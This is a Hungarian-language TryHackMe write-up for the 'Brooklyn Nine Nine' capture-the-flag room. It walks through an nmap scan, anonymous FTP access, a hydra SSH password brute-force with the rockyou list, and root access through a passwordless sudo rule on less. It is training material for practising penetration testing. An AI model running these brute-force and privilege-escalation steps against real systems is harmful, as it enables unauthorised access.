THM Brooklyn Nine Nine Writeup


#THM Writeup Hack Linux

2021 Oct 05: 17:45

Task 1 Deploy and get hacking

[1] User flag

Szokásos nmap scannel kezdünk. nmap -sV Az eredményből láthatjuk hogy három port van nyitva.

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.8.110.21
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
|   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_  256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

Nézzünk rá az FTP szerverre, amin engedélyezve van az anonymous login, így jelszó nélkül is be lehet lépni.

ftp <IP>

Majd felhasználónévnek adjuk meg, hogy anonymous, a jelszót pedig hagyjuk üresen.

Itt egy darab fájl található, amit a get <filename> paranccsal tölthetünk le.

A 22-es porton fut egy ssh. A letöltött fájlban találgható egy felhasználónév. Bruteforceoljuk hydra segítségével a talált névvel. hydra -l <username> -P <rockyou elérési út> ssh://<IP> -t 4

Miután bejutottunk, keressük meg az user flagünket. find / -name user.txt -type f 2> /dev/nul Ezzel az egész gépen keresünk egy user.txt nevű fájlt.

[2] Root flag

Most jön a gép rootolása. Nézzük meg, hogy a jelenlegi felhasználónk milyen parancsokat futtathat rootként. sudo -l Jelszó beírása után a következő derül ki : (ALL) NOPASSWD: /usr/bin/less. Úgy tűnik hogy a less parancsot tudjuk rootként futtatni jelszó nélkül. A GTFOBins oldalon le van írva hogyan tudunk root privilégiumot szerezni.

sudo /usr/bin/less /etc/profile